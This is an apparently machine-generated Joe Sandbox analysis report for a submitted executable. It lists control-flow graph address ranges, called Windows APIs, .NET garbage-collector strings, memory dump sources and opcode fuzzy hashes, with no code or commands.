                                                                                                                                                                        • Opcode ID: 6f93bc1d4941456f45dda91854c7f695a82bcce70b9b063c41ad38af2987899c
                                                                                                                                                                        • Instruction ID: e4f33378b2a55094f037e50817fd5aa2be1a35be69717c5872791ceb16b2672b
                                                                                                                                                                        • Opcode Fuzzy Hash: 6f93bc1d4941456f45dda91854c7f695a82bcce70b9b063c41ad38af2987899c
                                                                                                                                                                        • Instruction Fuzzy Hash: C1B26D77A29B46C5EB408B18E840A7AB3A4FF8AF84F544635DA5C97764EF3CE451C380

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1039 7ff67fa59340-7ff67fa5936a call 7ff67fa50130 call 7ff67fa51650 1044 7ff67fa5936c-7ff67fa59371 1039->1044 1045 7ff67fa59373-7ff67fa59384 1039->1045 1046 7ff67fa59388-7ff67fa593a2 1044->1046 1045->1046 1047 7ff67fa593ab-7ff67fa593bc 1046->1047 1048 7ff67fa593a4-7ff67fa593a9 1046->1048 1049 7ff67fa593c0-7ff67fa593fa call 7ff67fa4c190 call 7ff67fa511e0 call 7ff67fa526a0 1047->1049 1048->1049 1056 7ff67fa5940c-7ff67fa59413 call 7ff67fa51010 1049->1056 1057 7ff67fa593fc-7ff67fa5940a 1049->1057 1060 7ff67fa59418 1056->1060 1058 7ff67fa5941f-7ff67fa59440 call 7ff67fa65d00 1057->1058 1063 7ff67fa5944c-7ff67fa5946d call 7ff67fa52720 call 7ff67fa53440 1058->1063 1064 7ff67fa59442-7ff67fa5944b 1058->1064 1060->1058 1069 7ff67fa59476-7ff67fa594a4 call 7ff67fa65f00 1063->1069 1070 7ff67fa5946f 1063->1070 1073 7ff67fa594a6-7ff67fa594a8 1069->1073 1074 7ff67fa594b9-7ff67fa594d7 call 7ff67fa53410 call 7ff67fa52670 1069->1074 1070->1069 1073->1074 1075 7ff67fa594aa-7ff67fa594b8 1073->1075 1080 7ff67fa5955d-7ff67fa59596 call 7ff67fa53420 call 7ff67fa53430 call 7ff67fa52560 call 7ff67fa52680 1074->1080 1081 7ff67fa594dd-7ff67fa594e7 1074->1081 1102 7ff67fa59598-7ff67fa595b0 1080->1102 1103 7ff67fa595b1-7ff67fa595c0 1080->1103 1083 7ff67fa59506-7ff67fa5952d call 7ff67fa51200 1081->1083 1084 7ff67fa594e9-7ff67fa594f0 1081->1084 1093 7ff67fa59539-7ff67fa59546 1083->1093 1094 7ff67fa5952f-7ff67fa59537 call 7ff67fa51200 1083->1094 1087 7ff67fa5954a-7ff67fa59556 1084->1087 1088 7ff67fa594f2-7ff67fa594f9 1084->1088 1087->1080 1091 7ff67fa594fb-7ff67fa594fe 1088->1091 1092 7ff67fa59500-7ff67fa59504 1088->1092 1091->1087 1092->1087 1093->1087 1094->1087 1104 7ff67fa595c2-7ff67fa595d3 1103->1104 1105 7ff67fa595f1-7ff67fa595f8 1103->1105 1106 7ff67fa595dc-7ff67fa595ef 1104->1106 1107 7ff67fa595d5-7ff67fa595da 1104->1107 1108 7ff67fa59724 1105->1108 1109 7ff67fa595fe-7ff67fa59609 1105->1109 1106->1109 1107->1109 1111 7ff67fa59729-7ff67fa59741 1108->1111 1109->1108 1110 7ff67fa5960f-7ff67fa5962f call 7ff67fa71560 1109->1110 1113 7ff67fa59634-7ff67fa59668 call 7ff67fa533d0 call 7ff67fa53400 call 7ff67fa533e0 call 7ff67fa533f0 1110->1113 1122 7ff67fa59719-7ff67fa5971b 1113->1122 1123 7ff67fa5966e-7ff67fa5969d call 7ff67fa52660 call 7ff67faaac48 1113->1123 1122->1111 1128 7ff67fa5971d 1123->1128 1129 7ff67fa5969f-7ff67fa596b1 call 7ff67fa50b90 1123->1129 1128->1108 1129->1108 1132 7ff67fa596b3-7ff67fa596bf call 7ff67fa50c50 1129->1132 1135 7ff67fa596d4-7ff67fa596ff call 7ff67fa6fdd0 1132->1135 1136 7ff67fa596c1-7ff67fa596d2 call 7ff67fa42c80 1132->1136 1141 7ff67fa59706-7ff67fa59708 1135->1141 1142 7ff67fa59701 call 7ff67faaac40 1135->1142 1136->1111 1141->1122 1144 7ff67fa5970a-7ff67fa59714 call 7ff67fa84840 call 7ff67fa42c80 1141->1144 1142->1141 1144->1122
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: GlobalMemoryProcessQueryStatus$CurrentFrequencyInformationObjectPerformance
                                                                                                                                                                        • String ID: Creation of WaitForGCEvent failed$TraceGC is not turned on
                                                                                                                                                                        • API String ID: 133006248-518909315
                                                                                                                                                                        • Opcode ID: 3f99d9c4068ce16fac88113a0baf40306a504a41c0001bff05d2c2920de71d5b
                                                                                                                                                                        • Instruction ID: cf31bfaf8b8723ab8f7307ffc87f224e0ff4526a24a8f3f1a4a0dfb4aae489a5
                                                                                                                                                                        • Opcode Fuzzy Hash: 3f99d9c4068ce16fac88113a0baf40306a504a41c0001bff05d2c2920de71d5b
                                                                                                                                                                        • Instruction Fuzzy Hash: F8B18063E3DB42C2FA019B24A441E7A6395AF5AB84F445235E54ECB792EF2CF481C3C0
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InfoLocale
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2299586839-0
                                                                                                                                                                        • Opcode ID: ecc120c17447902b84dd65978579eb4ee08e6082c242e837b02859beb14b59ee
                                                                                                                                                                        • Instruction ID: 177230d399ef7b4c0ce0b17d086066838fdc7476aa65af009e5ce95776644b16
                                                                                                                                                                        • Opcode Fuzzy Hash: ecc120c17447902b84dd65978579eb4ee08e6082c242e837b02859beb14b59ee
                                                                                                                                                                        • Instruction Fuzzy Hash: B8219D33A29A50DAD724DF65E8009E937A4FB48398F600136FE4E83A89DF38D481C380
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 097b62bcefa2e15c075ed7cd1fc2a7246b24135ed2dc7981fe42efd19a6c3ad6
                                                                                                                                                                        • Instruction ID: ae7855b5292f39140080c13b91cb65648137a30f758fc156c308db44dd421f90
                                                                                                                                                                        • Opcode Fuzzy Hash: 097b62bcefa2e15c075ed7cd1fc2a7246b24135ed2dc7981fe42efd19a6c3ad6
                                                                                                                                                                        • Instruction Fuzzy Hash: 9D621573E38746C6FB658B29A494B367391BF66B84F108635E90ED3290FF3DA440C685
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2050909247-0
                                                                                                                                                                        • Opcode ID: bdf8833cee21c139ef57a5bee3b8c50e71db7ac1327d835877ec4aba224b51aa
                                                                                                                                                                        • Instruction ID: 0e73cbc486fa273998ffb72d0c59775d30c542193f2081b0ed54c2571969d516
                                                                                                                                                                        • Opcode Fuzzy Hash: bdf8833cee21c139ef57a5bee3b8c50e71db7ac1327d835877ec4aba224b51aa
                                                                                                                                                                        • Instruction Fuzzy Hash: 5902A0A3E38646C6FA158B26A850E3A77E1EF56B80F185736C50DD3264DF3CB581CAD0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 43a4ce6d3edcbc3c7c6dd526977bf27065133be5ff1af8be5729591fa77bad5d
                                                                                                                                                                        • Instruction ID: a9c75e7b245382a5fbde1bccbdf63ac2f6334caa76ba3081853cf08f1054cd8b
                                                                                                                                                                        • Opcode Fuzzy Hash: 43a4ce6d3edcbc3c7c6dd526977bf27065133be5ff1af8be5729591fa77bad5d
                                                                                                                                                                        • Instruction Fuzzy Hash: CBF17E23D3CB8385F601DB34A951A7667A1AFA6B40F549335E44DE66A2FF2C74D1C2C0

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 0 7ff67fa6c9b6-7ff67fa6c9bd 1 7ff67fa6c9da-7ff67fa6ca10 call 7ff67fa709b0 0->1 2 7ff67fa6c9bf-7ff67fa6c9d5 call 7ff67fa80c30 0->2 8 7ff67fa6ca25-7ff67fa6ca37 1->8 9 7ff67fa6ca12-7ff67fa6ca23 call 7ff67faaac40 1->9 7 7ff67fa6d0fd-7ff67fa6d120 2->7 10 7ff67fa6d127-7ff67fa6d12e 7->10 11 7ff67fa6d122 call 7ff67fa5bdb0 7->11 12 7ff67fa6ca39 call 7ff67fa667f0 8->12 13 7ff67fa6ca3e-7ff67fa6ca50 call 7ff67fa7adb0 call 7ff67fa5e5f0 8->13 9->8 11->10 12->13 22 7ff67fa6cabc-7ff67fa6cb0c call 7ff67fa6dfd0 call 7ff67fa72370 13->22 23 7ff67fa6ca52-7ff67fa6ca5c 13->23 35 7ff67fa6cb2b-7ff67fa6cb38 22->35 36 7ff67fa6cb0e-7ff67fa6cb25 call 7ff67fa50130 22->36 25 7ff67fa6cab5 23->25 26 7ff67fa6ca5e 23->26 25->22 28 7ff67fa6ca60-7ff67fa6ca6d 26->28 30 7ff67fa6caa5-7ff67fa6cab3 call 7ff67fa7d0e0 28->30 31 7ff67fa6ca6f-7ff67fa6caa0 call 7ff67faaf5b0 28->31 30->25 30->28 31->30 39 7ff67fa6cb3a-7ff67fa6cb44 35->39 40 7ff67fa6cb57-7ff67fa6cb5a 35->40 36->35 39->40 42 7ff67fa6cb46-7ff67fa6cb4e 39->42 43 7ff67fa6cb5c 40->43 44 7ff67fa6cb63-7ff67fa6cb79 call 7ff67fa42c80 40->44 42->40 45 7ff67fa6cb50 42->45 43->44 48 7ff67fa6cb7b-7ff67fa6cb83 44->48 49 7ff67fa6cbe6-7ff67fa6cc18 call 7ff67fa4c0a0 call 7ff67fa6a330 call 7ff67fa67e30 call 7ff67fa526e0 44->49 45->40 48->49 50 7ff67fa6cb85-7ff67fa6cb8c 48->50 62 7ff67fa6cc1a-7ff67fa6cc21 call 7ff67fa526e0 49->62 63 7ff67fa6cc2b-7ff67fa6cc37 call 7ff67fa526e0 49->63 50->49 52 7ff67fa6cb8e-7ff67fa6cb95 50->52 52->49 54 7ff67fa6cb97-7ff67fa6cba4 52->54 54->49 56 7ff67fa6cba6-7ff67fa6cbdf 54->56 56->49 62->63 68 7ff67fa6cc23-7ff67fa6cc26 call 7ff67fa81200 62->68 69 7ff67fa6cc3d-7ff67fa6ccbb EnterCriticalSection 63->69 70 7ff67fa6d0c7 call 7ff67fa6d130 63->70 68->63 72 7ff67fa6ccbd-7ff67fa6ccc4 69->72 73 7ff67fa6cd1e-7ff67fa6cd25 LeaveCriticalSection 69->73 77 7ff67fa6d0cc-7ff67fa6d0f6 GetTickCount64 70->77 72->73 76 7ff67fa6ccc6-7ff67fa6ccea call 7ff67fa4bc10 72->76 75 7ff67fa6cd2a-7ff67fa6cd4c 73->75 78 7ff67fa6cf66-7ff67fa6cf77 75->78 79 7ff67fa6cd52-7ff67fa6cd59 75->79 76->73 87 7ff67fa6ccec-7ff67fa6cd01 LeaveCriticalSection 76->87 77->7 81 7ff67fa6cf7d-7ff67fa6cf8c 78->81 82 7ff67fa6cd60-7ff67fa6cd66 79->82 81->70 84 7ff67fa6cf92-7ff67fa6cf99 81->84 85 7ff67fa6cd6c-7ff67fa6cd76 82->85 86 7ff67fa6ce59-7ff67fa6ce63 82->86 89 7ff67fa6cfa0-7ff67fa6cff0 84->89 90 7ff67fa6cd78 85->90 91 7ff67fa6cd99-7ff67fa6cd9c 85->91 86->82 88 7ff67fa6ce69-7ff67fa6cee5 call 7ff67fa4c570 86->88 87->75 92 7ff67fa6cd03-7ff67fa6cd0c 87->92 105 7ff67fa6cf0d-7ff67fa6cf17 88->105 106 7ff67fa6cee7-7ff67fa6ceea 88->106 89->89 94 7ff67fa6cff2-7ff67fa6d02f 89->94 95 7ff67fa6cd80-7ff67fa6cd87 90->95 91->86 96 7ff67fa6cda2-7ff67fa6cda8 91->96 92->75 97 7ff67fa6cd0e-7ff67fa6cd1c call 7ff67fa4bf70 92->97 94->77 99 7ff67fa6d035-7ff67fa6d0c5 call 7ff67fa6d130 call 7ff67fa69980 94->99 95->86 100 7ff67fa6cd8d-7ff67fa6cd97 95->100 101 7ff67fa6ce4c-7ff67fa6ce53 96->101 102 7ff67fa6cdae-7ff67fa6cdb5 96->102 97->75 99->77 100->91 100->95 101->86 101->96 108 7ff67fa6cdb7-7ff67fa6cdc8 102->108 109 7ff67fa6ce1f-7ff67fa6ce31 call 7ff67fa64020 102->109 111 7ff67fa6cf19-7ff67fa6cf24 105->111 112 7ff67fa6cf26-7ff67fa6cf51 call 7ff67fa70950 call 7ff67fa6a330 105->112 110 7ff67fa6cef1-7ff67fa6cef4 106->110 115 7ff67fa6cdca-7ff67fa6cdd1 108->115 116 7ff67fa6cdf3 108->116 109->78 130 7ff67fa6ce37-7ff67fa6ce3d 109->130 110->105 121 7ff67fa6cef6-7ff67fa6cf0b 110->121 122 7ff67fa6cf56-7ff67fa6cf5d 111->122 112->122 117 7ff67fa6cdd3-7ff67fa6cde1 call 7ff67fa64020 115->117 118 7ff67fa6cdee-7ff67fa6cdf1 115->118 120 7ff67fa6cdf6-7ff67fa6ce0f call 7ff67fa64020 116->120 117->78 139 7ff67fa6cde7-7ff67fa6cdec 117->139 118->116 118->120 120->78 140 7ff67fa6ce15-7ff67fa6ce1d 120->140 121->105 121->110 122->81 131 7ff67fa6cf5f-7ff67fa6cf64 call 7ff67fa69980 122->131 136 7ff67fa6ce44-7ff67fa6ce48 130->136 137 7ff67fa6ce3f 130->137 131->81 136->101 137->136 139->101 140->101
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: .NET BGC$BEGIN$condemned generation num: %d$m$qX
                                                                                                                                                                        • API String ID: 0-2393834873
                                                                                                                                                                        • Opcode ID: b4573e5521eb2daec4fdc1dac7b857241a61d624bfb449cc36c2373dcde47909
                                                                                                                                                                        • Instruction ID: 2d9f5b13a9cbeee741b2256b4233a1bf8ed8f912851d4f29a8c01ce2f4d1789c
                                                                                                                                                                        • Opcode Fuzzy Hash: b4573e5521eb2daec4fdc1dac7b857241a61d624bfb449cc36c2373dcde47909
                                                                                                                                                                        • Instruction Fuzzy Hash: F7224063D2C687C5F6119F29A841AB663A4FF66F45F046235EA4CD2262EF3CB481C7C0

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: GlobalMemoryStatus$Process$CurrentInformationObjectQuery
                                                                                                                                                                        • String ID: @$@$@
                                                                                                                                                                        • API String ID: 2645093340-1177533131
                                                                                                                                                                        • Opcode ID: 5dd9200fce8176dff0c68b0307820b989f4da3af5f934f64af2f0f02580b9126
                                                                                                                                                                        • Instruction ID: 5bad997d11e62d657e629cacdc490483507d94a631a25cf27ed3222dbc2aa856
                                                                                                                                                                        • Opcode Fuzzy Hash: 5dd9200fce8176dff0c68b0307820b989f4da3af5f934f64af2f0f02580b9126
                                                                                                                                                                        • Instruction Fuzzy Hash: 624162327186D1C5EF718F11E554BAAB7A0FB49BA0F444235DA9D93B88CF7CD4858B40

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        • FlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,00007FF67FA4474F,?,?,?,?,?,?,00007FF67FA41EA0), ref: 00007FF67FA4B82B
                                                                                                                                                                          • Part of subcall function 00007FF67FA51460: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF67FA4B84A), ref: 00007FF67FA5146F
                                                                                                                                                                          • Part of subcall function 00007FF67FA51460: GetNumaHighestNodeNumber.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF67FA4B84A), ref: 00007FF67FA514AD
                                                                                                                                                                          • Part of subcall function 00007FF67FA51460: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF67FA4B84A), ref: 00007FF67FA514D9
                                                                                                                                                                          • Part of subcall function 00007FF67FA51460: GetProcessGroupAffinity.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF67FA4B84A), ref: 00007FF67FA514EA
                                                                                                                                                                          • Part of subcall function 00007FF67FA51460: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF67FA4B84A), ref: 00007FF67FA514F9
                                                                                                                                                                        • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,00007FF67FA4474F,?,?,?,?,?,?,00007FF67FA41EA0), ref: 00007FF67FA4B89D
                                                                                                                                                                        • GetProcessAffinityMask.KERNEL32 ref: 00007FF67FA4B8B0
                                                                                                                                                                        • QueryInformationJobObject.KERNEL32 ref: 00007FF67FA4B8FE
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Process$AffinityCurrent$AllocErrorGroupHighestInfoInformationLastMaskNodeNumaNumberObjectQuerySystem
                                                                                                                                                                        • String ID: PROCESSOR_COUNT
                                                                                                                                                                        • API String ID: 1701933505-4048346908
                                                                                                                                                                        • Opcode ID: 1798012f5346184bb27c1ec9873b0fd67c426a3d4d250c8375ff5738cd3cdd6f
                                                                                                                                                                        • Instruction ID: a5cac764b5403ba42d4dc29df0413a48598a11d567901d21fdec7b3d0a93917e
                                                                                                                                                                        • Opcode Fuzzy Hash: 1798012f5346184bb27c1ec9873b0fd67c426a3d4d250c8375ff5738cd3cdd6f
                                                                                                                                                                        • Instruction Fuzzy Hash: 94317C27A28B43C6EA549B99D480BB963A1EF85798F440036D64EC7696DF2CE449C780

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00007FF67FA4B820: FlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,00007FF67FA4474F,?,?,?,?,?,?,00007FF67FA41EA0), ref: 00007FF67FA4B82B
                                                                                                                                                                          • Part of subcall function 00007FF67FA4B820: QueryInformationJobObject.KERNEL32 ref: 00007FF67FA4B8FE
                                                                                                                                                                          • Part of subcall function 00007FF67FA4B6C0: GetModuleHandleExW.KERNEL32(?,?,?,?,00007FF67FA44778,?,?,?,?,?,?,00007FF67FA41EA0), ref: 00007FF67FA4B6D1
                                                                                                                                                                        • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00007FF67FA41EA0), ref: 00007FF67FA448BE
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
